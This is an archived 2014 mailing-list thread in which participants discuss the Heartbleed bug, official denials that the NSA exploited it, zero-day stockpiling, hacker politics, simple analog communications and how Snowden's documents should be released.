From guninski at guninski.com Mon Apr 14 02:09:00 2014 From: guninski at guninski.com (Georgi Guninski) Date: Mon, 14 Apr 2014 12:09:00 +0300 Subject: White House, spy agencies deny NSA exploited 'Heartbleed' bug In-Reply-To: <1397461563.26026.YahooMailNeo@web126202.mail.ne1.yahoo.com> References: <1397461563.26026.YahooMailNeo@web126202.mail.ne1.yahoo.com> Message-ID: <20140414090900.GB2560@sivokote.iziade.m$> I am not fan of NSA, but suspect they exploited code execution much more than just reading. >From the openssl-1 Changelog, these appear more severe than HB to me. (some of these certainly affect 0.9 branch). *) Make openssl verify return errors. [Chris Palmer and Ben Laurie] *) Sanity check record length before skipping explicit IV in TLS 1.2, 1.1 and DTLS to fix DoS attack. *) Initialise tkeylen properly when encrypting CMS messages. Thanks to Solar Designer of Openwall for reporting this issue. *) Check for potentially exploitable overflows in asn1_d2i_read_bio BUF_mem_grow and BUF_mem_grow_clean. Refuse attempts to shrink buffer in CRYPTO_realloc_clean. On Mon, Apr 14, 2014 at 12:46:03AM -0700, jim bell wrote: > White House, spy agencies deny NSA exploited 'Heartbleed' bug  > photoSecurity experts warn there is little Internet users can do to protect themselve\WASHINGTON (Reuters) - The White House and U.S. intelligence agencies said on Friday neither the National Security Agency nor any other part of the government were aware before this month of the "Heartbleed" bug, denying a report that the spy agency exploited the glitch in widely used Web encryption technology to gather intelligence. > The White House, the NSA and the Office of the Director of National Intelligence issued statements after Bloomberg reported that the NSA was aware of the bug for at least two years and exploited it in order to obtain passwords and other basic information used in hacking operations. The Bloomberg report cited two unnamed sources it said were familiar with the matter. 
> The Heartbleed bug is considered one of the most serious Internet security flaws to be uncovered in recent years. > "Reports that NSA or any other part of the government were aware of the so-called Heartbleed vulnerability before April 2014 are wrong," White House National Security Council spokeswoman Caitlin Hayden said in a statement. > "This administration takes seriously its responsibility to help maintain an open, interoperable, secure and reliable Internet," Hayden added. > Bloomberg was not immediately available to comment. > The discovery of Heartbleed by researchers with Google Inc and a small security firm, Codenomicon, prompted the U.S. Homeland Security Department to advise businesses on Tuesday to review their servers to see if they were using vulnerable versions of widely used software known as OpenSSL. > OpenSSL is used to encrypt email and other communications and to protect the websites of big Internet companies, including Facebook Inc, Google Inc and Yahoo Inc. The bug, disclosed Monday, allows hackers to steal data without a trace. > NSA spokeswoman Vanee Vines said in a separate statement: "NSA was not aware of the recently identified vulnerability in OpenSSL, the so-called Heartbleed vulnerability, until it was made public in a private-sector cybersecurity report." > Hayden said the federal government relies on OpenSSL to protect the privacy of users of government websites and other online services. "If the federal government, including the intelligence community, had discovered this vulnerability prior to last week, it would have been disclosed to the community responsible for OpenSSL," Hayden added. > Hayden said that when U.S. agencies discover a new vulnerability in commercial and open-source software, "it is in the national interest to responsibly disclose the vulnerability rather than to hold it for an investigative or intelligence purpose." 
Such vulnerabilities are known as "zero-day" flaws because the software developers have had zero days to fix them. > In December, a five-member advisory panel convened to review electronic surveillance policy urged the White House to sharply curtail the use of undisclosed flaws and stop undercutting encryption standards. The panel included former White House cybersecurity advisor Richard Clarke. > In late February, a senior White House official said the Obama administration was intensively studying both issues. > The administration statements issued on Friday confirmed that the review had already "reinvigorated an interagency process for deciding when to share vulnerabilities" on a case-by-case basis. > The activities of the NSA have come under sharp scrutiny since former agency contractor Edward Snowden leaked numerous documents exposing expansive U.S. surveillance efforts. > Even before Snowden's emergence, former officials, including Clarke, told Reuters that offensive and spying considerations had dominated inside the NSA, causing it to withhold information instead of warning the public about new flaws. > Clarke told Reuters Friday that the NSA had not known of Heartbleed. > The U.S. government warned banks and other businesses on Friday to be on alert for hackers seeking to steal data exposed by the bug, as a German programmer who volunteered with OpenSSL took responsibility for inadvertently launching the security crisis. 
> (Additional reporting by Joseph Menn; Editing by Jonathan Oatis) From guninski at guninski.com Mon Apr 14 04:17:57 2014 From: guninski at guninski.com (Georgi Guninski) Date: Mon, 14 Apr 2014 14:17:57 +0300 Subject: Obama allows NSA to exploit 0-days: report Message-ID: <20140414111757.GC2560@sivokote.iziade.m$> http://www.theregister.co.uk/2014/04/14/obama_allows_nsa_to_exploit_0days_report/ Obama allows NSA to exploit 0-days: report ==== President Obama considered what the NSA should do if it becomes aware of a vulnerability that could help its activities. His decision led to the creation of “... a broad exception for 'a clear national security or law enforcement need'.” ==== m$ gives the nsa steady amount of their 0days (admitted), not counting the backdoors. From gizmoguy1 at gmail.com Mon Apr 14 09:49:27 2014 From: gizmoguy1 at gmail.com (John Preston) Date: Mon, 14 Apr 2014 17:49:27 +0100 Subject: Home-made communications and security technology Message-ID: <1397494167.2004.10.camel@localhost.localdomain> Given the enormous complexity of modern technology (100+ KLOC software projects, 1+ billion transistor CPUs, etc.) I view security failures to be an inevitability: the attack surface is rich for exploitation by enemies, and bugs and errors constantly emerge due to both man and machine. That said, I do not think it unwise to consider it a prerequisite for the most paranoid-level technologies that they be easily understandable and scrutinisable by individual people. Hence, I have an interest in pen-and-paper ciphers, simple wireless communications systems for Morse, voice, and data, and simple computers. Is this something other people think is a sensible or important line of inquiry? Do these technologies and the people using them exist? Are there movements advocating this approach? Thank you. 
From juan.g71 at gmail.com Mon Apr 14 15:15:08 2014 From: juan.g71 at gmail.com (Juan) Date: Mon, 14 Apr 2014 19:15:08 -0300 Subject: NSA good guys In-Reply-To: <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> References: <534691BD.1060904@cathalgarvey.me> <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> Message-ID: <534c5df2.671fec0a.5e1a.fffff958@mx.google.com> On Mon, 14 Apr 2014 22:08:29 +0200 tpb-crypto at laposte.net wrote: > > However, all their technical expertise exists to > > achieve some political goals. And when you look at the > > political beliefs of these people, you see that they suck big > > time. As engineers they may be competent, but there's a step > > above engineering, and there, they fail. > > > > Since when politics is a "step above" anything? Politicians are the > lowest of the low thugs and thus so is their art of thievery. Indeed. And what I'm getting at is that there are people in the 'security' industry who either consider politicians and the state to be a 'necessary evil', or worse, think that politicians and the political system they serve, are A Good Thing. In a nearby mailing list, there are a bunch of people who are funded by the american military(psycho killers) to create a so called 'anomity network'. Regardless of how good they are at writing code, their political beliefs are sick garbage. They operate on the laughable premise that they are the 'good guys' Same people who, when called out on the source of their funding have one argument : "you're a tinfoil conspiracy theorist!" (Wait, of course, that's not an argument, just puerile name-calling) So, I didn't mean that politicians are above engineers. I mean that political beliefs and understanding of political theory are more important than crypto knowledge. When a guy comes along quoting thomas jefferson and the like, rest assured he's part of the problem. 
From rysiek at hackerspace.pl Mon Apr 14 11:20:32 2014 From: rysiek at hackerspace.pl (rysiek) Date: Mon, 14 Apr 2014 20:20:32 +0200 Subject: NSA good guys In-Reply-To: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> References: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> Message-ID: <1898095.3HPr8ppers@lap> Dnia niedziela, 13 kwietnia 2014 20:32:18 Linux User pisze: > On Sun, 13 Apr 2014 01:28:14 +0200 > > Lodewijk andré de la porte wrote: > > So. Are the NSA guys good guys? Well. They're the enemy of the > > people, as they invade their privacy and therewith their safety. If > > you can be blackmailed, studied, influenced, etc. you are weak and > > vulnerable. Preaching to the choir, I guess. > > Well, I get the impression that some of the voices of this > choir still need some preaching directed at them =P > > > I noticed something interesting in digital 'security' > circles. People who deal with 'security' are, at first sight, > technical people and are concerned with issues such as > factoring integers, permutations, routing protocols, etc. > etc. etc. > > However, all their technical expertise exists to > achieve some political goals. And when you look at the > political beliefs of these people, you see that they suck big > time. As engineers they may be competent, but there's a step > above engineering, and there, they fail. This is so true. The "I'm not into politics, I just write code" stance needs to change. It *does* matter for whom you write your code and how you future-proof it from being use to abuse people. Simple example: dear sysadmins (of whom I am one), do you *really* need all those logs? They are a treasure-trove for LEAs. Unless you are required by law, just keep the last week or so, that's usually enough to debug problems as they arise. -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... 
Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Mon Apr 14 11:24:33 2014 From: rysiek at hackerspace.pl (rysiek) Date: Mon, 14 Apr 2014 20:24:33 +0200 Subject: Obama allows NSA to exploit 0-days: report In-Reply-To: <20140414111757.GC2560@sivokote.iziade.m$> References: <20140414111757.GC2560@sivokote.iziade.m$> Message-ID: <6723214.SG909br3NP@lap> Dnia poniedziałek, 14 kwietnia 2014 14:17:57 Georgi Guninski pisze: > http://www.theregister.co.uk/2014/04/14/obama_allows_nsa_to_exploit_0days_re > port/ > > Obama allows NSA to exploit 0-days: report > (...) Well... http://rys.io/en/134 -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From nathan at squimp.com Mon Apr 14 12:05:45 2014 From: nathan at squimp.com (Nathan Andrew Fain) Date: Mon, 14 Apr 2014 21:05:45 +0200 Subject: Obama allows NSA to exploit 0-days: report In-Reply-To: <20140414111757.GC2560@sivokote.iziade.m$> References: <20140414111757.GC2560@sivokote.iziade.m$> Message-ID: <534C3189.2060907@squimp.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 The argument from the administration, NSA or any other channel holds no water. Quiet simply if the NSA thinks responsible disclosure is the way to go where are the 0days they have disclosed? On 14/04/2014 13:17, Georgi Guninski wrote: > http://www.theregister.co.uk/2014/04/14/obama_allows_nsa_to_exploit_0days_report/ > > > > Obama allows NSA to exploit 0-days: report > > ==== President Obama considered what the NSA should do if it > becomes aware of a vulnerability that could help its activities. > His decision led to the creation of “... 
a broad exception for 'a > clear national security or law enforcement need'.” ==== > > m$ gives the nsa steady amount of their 0days (admitted), not > counting the backdoors. > > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iEYEARECAAYFAlNMMYkACgkQveagdEkPM4AyIgCg3RkdI1DEuShfRnCdcVdFhInG wrgAnjdV5cfjQAyVXNR70kgPVxNcA/yI =HOOm -----END PGP SIGNATURE----- From tpb-crypto at laposte.net Mon Apr 14 13:08:29 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Mon, 14 Apr 2014 22:08:29 +0200 Subject: NSA good guys In-Reply-To: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> References: <534691BD.1060904@cathalgarvey.me> <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> Message-ID: <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> > Message du 14/04/14 02:01 > De : "Linux User" > > > > So. Are the NSA guys good guys? Well. They're the enemy of the > > people, as they invade their privacy and therewith their safety. If > > you can be blackmailed, studied, influenced, etc. you are weak and > > vulnerable. Preaching to the choir, I guess. > > Well, I get the impression that some of the voices of this > choir still need some preaching directed at them =P > > I noticed something interesting in digital 'security' > circles. People who deal with 'security' are, at first sight, > technical people and are concerned with issues such as > factoring integers, permutations, routing protocols, etc. > etc. etc. > > However, all their technical expertise exists to > achieve some political goals. And when you look at the > political beliefs of these people, you see that they suck big > time. As engineers they may be competent, but there's a step > above engineering, and there, they fail. > Since when politics is a "step above" anything? Politicians are the lowest of the low thugs and thus so is their art of thievery. 
From tpb-crypto at laposte.net Mon Apr 14 13:34:33 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Mon, 14 Apr 2014 22:34:33 +0200 Subject: White House, spy agencies deny NSA exploited 'Heartbleed' bug In-Reply-To: <1397461563.26026.YahooMailNeo@web126202.mail.ne1.yahoo.com> References: <1397461563.26026.YahooMailNeo@web126202.mail.ne1.yahoo.com> Message-ID: <1180870710.49045.1397507673676.JavaMail.www@wwinf8305> > Message du 14/04/14 10:17 > De : "jim bell" > White House, spy agencies deny NSA exploited 'Heartbleed' bug  > photoSecurity experts warn there is little Internet users can do to protect themselve\WASHINGTON (Reuters) - The White House and U.S. intelligence agencies said on [...] And how about the heartbleed being used past year against freenode? Who would use a zero-day against freenode if not spy agencies? Are they seriously thinking anybody will believe such a denial? lol From jamesdbell9 at yahoo.com Mon Apr 14 23:35:10 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Mon, 14 Apr 2014 23:35:10 -0700 (PDT) Subject: White House, spy agencies deny NSA exploited 'Heartbleed' bug In-Reply-To: <1180870710.49045.1397507673676.JavaMail.www@wwinf8305> References: <1397461563.26026.YahooMailNeo@web126202.mail.ne1.yahoo.com> <1180870710.49045.1397507673676.JavaMail.www@wwinf8305> Message-ID: <1397543710.18220.YahooMailNeo@web126206.mail.ne1.yahoo.com> From: "tpb-crypto at laposte.net" > Message du 14/04/14 10:17 > De : "jim bell" > White House, spy agencies deny NSA exploited 'Heartbleed' bug  > photoSecurity experts warn there is little Internet users can do to protect themselve\WASHINGTON (Reuters) - The White House and U.S. intelligence agencies said on [...] >And how about the heartbleed being used past year against freenode? Who would use a zero-day against >freenode if not spy agencies? >Are they seriously thinking anybody will believe such a denial? 
lol I would think that at some point, the NSA would become too embarrassed to admit that they HADN'T discovered and employed such an exploit! Which leads me to a question:  Presumably, the NSA has billions of emails locked up in Utah, or wherever they had previously used as a data-store.  Does the revelation of the Heartbleed bug mean that the NSA could have quickly logged onto millions of accounts, read emails in the clear, etc?           Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2039 bytes Desc: not available URL: From rysiek at hackerspace.pl Mon Apr 14 14:57:16 2014 From: rysiek at hackerspace.pl (rysiek) Date: Mon, 14 Apr 2014 23:57:16 +0200 Subject: NSA good guys In-Reply-To: <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> References: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> Message-ID: <1603449.SJ9FqTUdKW@lap> Dnia poniedziałek, 14 kwietnia 2014 22:08:29 tpb-crypto at laposte.net pisze: > > Message du 14/04/14 02:01 > > De : "Linux User" > > > > > So. Are the NSA guys good guys? Well. They're the enemy of the > > > people, as they invade their privacy and therewith their safety. If > > > you can be blackmailed, studied, influenced, etc. you are weak and > > > vulnerable. Preaching to the choir, I guess. > > > > Well, I get the impression that some of the voices of this > > choir still need some preaching directed at them =P > > > > I noticed something interesting in digital 'security' > > circles. People who deal with 'security' are, at first sight, > > technical people and are concerned with issues such as > > factoring integers, permutations, routing protocols, etc. > > etc. etc. > > > > However, all their technical expertise exists to > > achieve some political goals. And when you look at the > > political beliefs of these people, you see that they suck big > > time. 
As engineers they may be competent, but there's a step > > above engineering, and there, they fail. > > Since when politics is a "step above" anything? Politicians are the lowest > of the low thugs and thus so is their art of thievery. There are two main meanings of the term "politics". The one you are referring to is the "pardon-less, dirty fight for power", and is the reason many describe themselves as "apolitical". The other is the classical "of, for, or relating to citizens": http://en.wikipedia.org/wiki/Politics This is the one I and the parent spoke about. It is not about the temporary/current power struggle, but about the general *policies* regarding... well, anything, really. For example, the fact that Deric Lostutter faces more jailtime than rapists he exposed: http://politicalblindspot.com/he-exposed-steubenville-now-what/ ...is a direct effect of hackers not engaging in politics (in the second sense). And a great exemplification of the good old "regardless of whether or not you are interested in politics, politics *will* get interested in you, eventually" rule. I despise the first version of "politics"; I firmly stand on the position we have to start engaging in the second version, though. -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. 
URL: From nymble at gmail.com Tue Apr 15 00:52:33 2014 From: nymble at gmail.com (nymble) Date: Tue, 15 Apr 2014 00:52:33 -0700 Subject: White House, spy agencies deny NSA exploited 'Heartbleed' bug In-Reply-To: <1180870710.49045.1397507673676.JavaMail.www@wwinf8305> References: <1397461563.26026.YahooMailNeo@web126202.mail.ne1.yahoo.com> <1180870710.49045.1397507673676.JavaMail.www@wwinf8305> Message-ID: <02A63D1F-D387-4CD7-85CB-F1299522B632@gmail.com> >> White House, spy agencies deny NSA exploited 'Heartbleed' bug >> photoSecurity experts warn there is little Internet users can do to protect themselve\WASHINGTON (Reuters) - The White House and U.S. intelligence agencies said on [...] > > And how about the heartbleed being used past year against freenode? Who would use a zero-day against freenode if not spy agencies? > > Are they seriously thinking anybody will believe such a denial? lol There are other three letter agencies in the world …. BND (Bundesnachrichtendienst) is more likely than NSA as primary instigator. From damico at dcon.com.br Mon Apr 14 21:08:03 2014 From: damico at dcon.com.br (Jose Damico) Date: Tue, 15 Apr 2014 01:08:03 -0300 Subject: Home-made communications and security technology In-Reply-To: <1397494167.2004.10.camel@localhost.localdomain> References: <1397494167.2004.10.camel@localhost.localdomain> Message-ID: <534CB0A3.4050702@dcon.com.br> I think, that one important and simple tool that will remain useful for the next decades is Analog Audio Encryption. Radio & Analog communications are simple to implement and very useful for good and for bad, but I think that what will keep this technology live for situations, like wars, conflicts, protests etc, will be the use of Audio Encryption over Radio & Analog communications. Best Regards Yap On 04/14/2014 01:49 PM, John Preston wrote: > Given the enormous complexity of modern technology (100+ KLOC software > projects, > 1+ billion transistor CPUs, etc.) 
> I view security failures to be an
> inevitability: the attack surface is rich for exploitation by enemies,
> and bugs and errors constantly emerge due to both man and machine.
>
> That said, I do not think it unwise to consider it a prerequisite for
> the most paranoid-level technologies that they be easily understandable
> and scrutinisable by individual people. Hence, I have an interest in
> pen-and-paper ciphers, simple wireless communications systems for Morse,
> voice, and data, and simple computers.
>
> Is this something other people think is a sensible or important line of
> inquiry? Do these technologies and the people using them exist? Are
> there movements advocating this approach? Thank you.
>

From tpb-crypto at laposte.net Mon Apr 14 19:23:25 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Tue, 15 Apr 2014 04:23:25 +0200
Subject: NSA good guys
In-Reply-To: <534c5df2.671fec0a.5e1a.fffff958@mx.google.com>
References: <534691BD.1060904@cathalgarvey.me> <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> <534c5df2.671fec0a.5e1a.fffff958@mx.google.com>
Message-ID: <877505804.55836.1397528605646.JavaMail.www@wwinf8315>

> Message of 15/04/14 00:46
> From: "Juan"
>
> So, I didn't mean that politicians are above engineers. I mean
> that political beliefs and understanding of political theory
> are more important than crypto knowledge.
>

A few years ago, I was studying timezones to link them to geolocation databases and get an approximation of the correct timezone customers would be using a certain service; that was to be used to sync clocks and plan backups for low-traffic hours. If you had the displeasure of doing this kind of job once, you are certain to get hit by the fact that politicians make a point of messing with time standards just to meet "political goals", like bosses that change desks' places just to make the office "more like their style", like dogs pissing on lampposts.

That is kind of primitive monkey behavior; I think many of you share this feeling. I find such stupid capricious behavior is not worthy of respect and the people who do it, not worthy of their positions. There is no way of respecting any of them, since they are no better than dogs, by acting that way. It is bad when a boss does it, but it is much worse when a politician does such things.

Sharing my frustration, a guy in a forum said these wise words, more or less:

- 300 years ago we got rid of the influence of religion, so humanity could advance. Now the time for the politicians is up.

The current stage of the internet crypto is the same as the current stage of NASA going to Mars. We won't even get to low Earth orbit if we don't shed the weight of so many stakeholders - not to call them parasites so directly. Either we get back to the roots and do nimble and usable things - that a human can understand and manage alone - or we won't go anywhere.

I agree it is wise we understand politics, just to work around them.

From tpb-crypto at laposte.net Mon Apr 14 19:46:15 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Tue, 15 Apr 2014 04:46:15 +0200
Subject: NSA good guys
In-Reply-To: <1603449.SJ9FqTUdKW@lap>
References: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> <1603449.SJ9FqTUdKW@lap>
Message-ID: <972157717.55906.1397529975026.JavaMail.www@wwinf8315>

> Message of 15/04/14 01:00
> From: "rysiek"
>
> For example, the fact that Deric Lostutter faces more jailtime than rapists he
> exposed:
> http://politicalblindspot.com/he-exposed-steubenville-now-what/
>
> ...is a direct effect of hackers not engaging in politics (in the second
> sense). And a great exemplification of the good old "regardless of whether or
> not you are interested in politics, politics *will* get interested in you,
> eventually" rule.
>

One could argue that laws which punish hacking as a higher offense than rape is a byproduct of stupid politicians scared by technology which they don't have any understanding of. As an instance, there are countries in which probing a system's vulnerabilities gives you jail time; you doing a port scan is a criminal offense depending on your citizenship.

This harks back to my argument that politics is nowadays nothing more than religion was a few centuries ago. There was a time priests would throw holy water against locomotives because them howling machines were surely hiding some kind of devil in their bellies. Politicians not understanding what technology is about just throw all the police they can at it. The results of that are things like the cameras in London and that huge NSA datacenter in Utah.

From dan at geer.org Tue Apr 15 05:42:25 2014
From: dan at geer.org (dan at geer.org)
Date: Tue, 15 Apr 2014 08:42:25 -0400
Subject: White House, spy agencies deny NSA exploited 'Heartbleed' bug
In-Reply-To: Your message of "Tue, 15 Apr 2014 00:52:33 PDT." <02A63D1F-D387-4CD7-85CB-F1299522B632@gmail.com>
Message-ID: <20140415124225.90DA72280BF@palinka.tinho.net>

nymble writes:
> There are other three letter agencies in the world. BND
> (Bundesnachrichtendienst) is more likely than NSA as primary

The number of people in China working over open source is larger than anywhere else and by a lot. Granted, automation (in the West) may beat massed manual labor (in the East), but for me and thee the differences in method seem not to matter in the short run.

--dan

From drwho at virtadpt.net Tue Apr 15 10:58:08 2014
From: drwho at virtadpt.net (The Doctor)
Date: Tue, 15 Apr 2014 10:58:08 -0700
Subject: Obama allows NSA to exploit 0-days: report
In-Reply-To: <534C3189.2060907@squimp.com>
References: <20140414111757.GC2560@sivokote.iziade.m$> <534C3189.2060907@squimp.com>
Message-ID: <534D7330.7090600@virtadpt.net>

On 04/14/2014 12:05 PM, Nathan Andrew Fain wrote:
> The argument from the administration, NSA or any other channel
> holds no water.

If the NSA - one of whose observed tasks is pwning everything and everyone - does NOT have at least a small cadre monitoring F/OSS projects for 0-days to stockpile, then somebody is asleep at the switch. This seems like too big a pie full of juicy vulnerabilities to not have a couple of digits in.

--
The Doctor [412/724/301/703] [ZS]
Developer, Project Byzantium: http://project-byzantium.org/
PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1
WWW: https://drwho.virtadpt.net/

Sendmail isn't evil, it's job security.
From drwho at virtadpt.net Tue Apr 15 11:03:18 2014
From: drwho at virtadpt.net (The Doctor)
Date: Tue, 15 Apr 2014 11:03:18 -0700
Subject: NSA good guys
In-Reply-To: <972157717.55906.1397529975026.JavaMail.www@wwinf8315>
References: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> <1603449.SJ9FqTUdKW@lap> <972157717.55906.1397529975026.JavaMail.www@wwinf8315>
Message-ID: <534D7466.4040906@virtadpt.net>

On 04/14/2014 07:46 PM, tpb-crypto at laposte.net wrote:
> One could argue that laws which punish hacking as a higher offense
> than rape is a byproduct of stupid politicians scared by technology
> which they don't have
> any understanding of.

Perhaps it is due to their thinking that technology poses a serious threat to their power bases.

--
The Doctor [412/724/301/703] [ZS]
PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1
WWW: https://drwho.virtadpt.net/

...that's the same combination I've got on my luggage!

From shelley at misanthropia.info Tue Apr 15 13:34:46 2014
From: shelley at misanthropia.info (shelley at misanthropia.info)
Date: Tue, 15 Apr 2014 13:34:46 -0700
Subject: Why didn't Snowden disclose Heartbleed (and others)?
In-Reply-To: <534D8446.7010508@cpunk.us>
References: <534D8446.7010508@cpunk.us>
Message-ID: <1397594086.11002.106883253.56A2052F@webmail.messagingengine.com>

On Tue, Apr 15, 2014, at 12:11 PM, Cypher wrote:
[...]
> I say fuck national security. These guys are burning down the entire world just
> to further their agenda. They deserve no consideration, even if it does put
> them at a disadvantage.

+1! They put the entire world of e-commerce and communication at a disadvantage by intentionally weakening encryption standards. Fuck them with a chainsaw. Drop the whole cache of Snowden docs at once, let the sunlight in and watch these crooked cockroach fucks shit themselves in panic.

From cypher at cpunk.us Tue Apr 15 12:11:02 2014
From: cypher at cpunk.us (Cypher)
Date: Tue, 15 Apr 2014 14:11:02 -0500
Subject: Why didn't Snowden disclose Heartbleed (and others)?
In-Reply-To:
References:
Message-ID: <534D8446.7010508@cpunk.us>

On 04/15/2014 11:16 AM, Lodewijk andré de la porte wrote:
> Exhaustive list of possibilities (please extend where possible):
> A Did not know
> B Did not care
> C Felt like it would negatively impact the NSA's (legitimate) functioning
> D Didn't get around to it yet
> E Snowden is an unconventional NSA set up
> F Snowden's documents are not recent enough

Personally, I'm going with D but with some caveats. Snowden has long preached the 'encryption works but the endpoints are so weak that it often doesn't matter'. I've always read this as 'encryption works when it's done right. And it's almost never done right'. This might have been a hint about Heartbleed, but I doubt it. I don't see Snowden as the type of man who'd put the entire world's security at risk just in the interests of US National Security.

This is why I've long been an advocate of total disclosure. I think the document holders should publish everything they have. After they do that, they could continue to 'leak release' documents with detailed explanations for those who are too lazy or too confused by the documents to sift through them and read them, but having a document dump out there would make the process of disclosure /much/ faster. And it would freak the NSA out - a happy plus.

I say fuck national security. These guys are burning down the entire world just to further their agenda. They deserve no consideration, even if it does put them at a disadvantage.

Me

--
Want to communicate with me privately? Find my PGP public key here:
http://pgp.mit.edu/pks/lookup?op=get&search=0x5BAEB5B2FA26826B
Fingerprint: 6728 40CE 35EE 0BF3 2E15 C7CC 5BAE B5B2 FA26 826B

From jamesdbell9 at yahoo.com Tue Apr 15 16:57:06 2014
From: jamesdbell9 at yahoo.com (jim bell)
Date: Tue, 15 Apr 2014 16:57:06 -0700 (PDT)
Subject: Fw: Why didn't Snowden disclose Heartbleed (and others)?
In-Reply-To: <1397606160.81525.YahooMailNeo@web126203.mail.ne1.yahoo.com>
References: <534D8446.7010508@cpunk.us> <1397606160.81525.YahooMailNeo@web126203.mail.ne1.yahoo.com>
Message-ID: <1397606226.48907.YahooMailNeo@web126204.mail.ne1.yahoo.com>

From: jim bell
From: Lodewijk andré de la porte

2014-04-15 21:11 GMT+02:00 Cypher :
>> This is why I've long been an advocate of total disclosure. I think
>> the document holders should publish everything they have. After they
>> do that, they could continue to 'leak release' documents with detailed
>> explanations for those who are too lazy or too confused by the
>> documents to sift through them and read them but having a document
>> dump out there would make the process of disclosure /much/ faster.
>
> The problem is that the general public is very slow to learn. Every step along the way even the wise said things
> like "OH! The NSA said A, but they'll never say B!". Then two weeks later the docs show that B has not just
> been said, it'd been SCREAMED. Then the word is "But they'll never say C!". Etc. Maybe at some point
> people will pick it up differently.
>
> It also fits the media format better to drip info. A new news article every new drip. That makes for a lot more
> exposure.

If they are going to 'drip, drip, drip' it, they should release it all first in hashed form, so that:
1. We ultimately know we get it all.
2. We know it hasn't been modified from the form it was originally in.

Jim Bell
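Jim Bell's "release it all first in hashed form" idea written out as an added example; this is not code from the thread or from any of its participants. The publisher commits to every document up front (a SHA-256 over a per-document random nonce plus the document, and one root digest over the sorted manifest), and anyone holding the published manifest can check each later "drip" for alteration and see what has still not been released. The document names and contents are constructed, and the nonce is an addition to the proposal: a bare hash of a short, guessable document would let anyone confirm a guess at its contents from the manifest alone.

```python
"""Commit-then-drip document release: publish commitments first, documents later."""
import hashlib
import os
from typing import Dict, List, Tuple

NONCE_LEN = 32


def commitment(nonce: bytes, data: bytes) -> str:
    """SHA-256 over nonce || data. The nonce (revealed together with the
    document) stops anyone from confirming a guess at a short or predictable
    document just from its published digest."""
    h = hashlib.sha256()
    h.update(nonce)
    h.update(data)
    return h.hexdigest()


def manifest_root(manifest: Dict[str, str]) -> str:
    """One digest over the whole sorted manifest, so the list of commitments
    itself cannot be quietly extended or trimmed after it is published."""
    lines = "".join(f"{doc_id}:{digest}\n" for doc_id, digest in sorted(manifest.items()))
    return hashlib.sha256(lines.encode("utf-8")).hexdigest()


def build_manifest(documents: Dict[str, bytes]) -> Tuple[Dict[str, str], Dict[str, bytes], str]:
    """Publisher side. Returns (manifest, nonces, root): the manifest and root
    go public on day one; each nonce is revealed alongside its document."""
    nonces = {doc_id: os.urandom(NONCE_LEN) for doc_id in documents}
    manifest = {doc_id: commitment(nonces[doc_id], data) for doc_id, data in documents.items()}
    return manifest, nonces, manifest_root(manifest)


class DripVerifier:
    """Reader side: checks every released (doc_id, nonce, document) against the
    manifest that was published before the first release."""

    def __init__(self, manifest: Dict[str, str], published_root: str):
        if manifest_root(manifest) != published_root:
            raise ValueError("manifest does not match the published root digest")
        self.manifest = dict(manifest)
        self.received: Dict[str, bytes] = {}

    def accept(self, doc_id: str, nonce: bytes, data: bytes) -> str:
        """Return "ok", "unknown" (never committed to) or "mismatch" (altered
        since the commitment, or wrong nonce)."""
        if doc_id not in self.manifest:
            return "unknown"
        if commitment(nonce, data) != self.manifest[doc_id]:
            return "mismatch"
        self.received[doc_id] = data
        return "ok"

    def missing(self) -> List[str]:
        """Committed-to documents that have not been released (correctly) yet."""
        return sorted(set(self.manifest) - set(self.received))


def demo() -> Dict[str, object]:
    """Walk through one release: two good drips, one altered drip, one unknown id."""
    # Constructed sample documents, not real material.
    docs = {
        "doc-001": b"budget summary (constructed sample)",
        "doc-002": b"program overview slides (constructed sample)",
        "doc-003": b"meeting notes (constructed sample)",
    }
    manifest, nonces, root = build_manifest(docs)  # published on day one
    verifier = DripVerifier(manifest, root)        # built by any reader later
    results: Dict[str, object] = {
        "first": verifier.accept("doc-001", nonces["doc-001"], docs["doc-001"]),
        "altered": verifier.accept("doc-002", nonces["doc-002"], docs["doc-002"] + b" [edited]"),
        "unknown": verifier.accept("doc-999", nonces["doc-001"], b"not in the manifest"),
        "second": verifier.accept("doc-002", nonces["doc-002"], docs["doc-002"]),
    }
    results["still_missing"] = verifier.missing()
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```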
From l at odewijk.nl Tue Apr 15 08:28:26 2014
From: l at odewijk.nl (Lodewijk andré de la porte)
